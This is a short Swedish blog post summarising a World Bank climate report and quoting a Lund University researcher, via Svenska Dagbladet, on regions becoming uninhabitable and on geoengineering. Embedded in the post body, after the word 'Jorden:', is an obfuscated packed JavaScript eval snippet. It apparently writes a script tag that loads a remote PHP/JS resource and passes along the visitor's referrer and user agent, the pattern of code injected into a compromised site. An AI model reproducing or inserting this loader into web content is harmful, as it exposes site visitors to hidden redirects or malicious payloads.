Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Så kan delar av jorden bli helt obeboeliga

Så kan delar av jorden bli helt obeboeliga
Sebastian

Jorden: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydhsi|var|u0026u|referrer|tasys||js|php’.split(’|’),0,{}))
Tidigare idag släppte Världsbanken en rapport som handlar om risken för de klimatförändringar som kan bli om ca 50 år.

Studien visar att jordens medeltemperatur  kan komma öka med fyra grader, det är en ökning med dubbelt så mycket som gruppen presenterade under klimatkonferensen i Köpenhamn för tre år sedan.

Så här svarar Lennart Olsson som forskar om konsekvenser av klimatförändringar vid Lunds Universitet till Svenska Dagbladet:

4. Kan delar av jorden bli obeboeliga?

– I ett scenario för 2200-talet, då våra barnbarn är döda, får en fjärdedel av jordens landytor så hög temperatur att människor drabbas av fysiologisk värmestress, det vill säga svettningen räcker inte för att hålla rätt kroppstemperatur, 37 grader. Denna risk är mycket stor för folkrika regioner som Sydasien och Medelhavsområdet, men även för viktiga jordbruksregioner som mellersta USA.

5. Finns någon ny smart teknik?

– En idé är att manipulera jordens atmosfär att släppa igenom mindre solvärme, en annan att manipulera oceanerna att ta upp mera koldioxid. Båda idéerna anses mycket riskabla. Och till exempel kärnkraft kan aldrig bli mer än en marginell del av en global energiförsörjning

Fler frågor och svar om Jorden och klimatet finns att läsa hos svd.se här!

Via: svd.se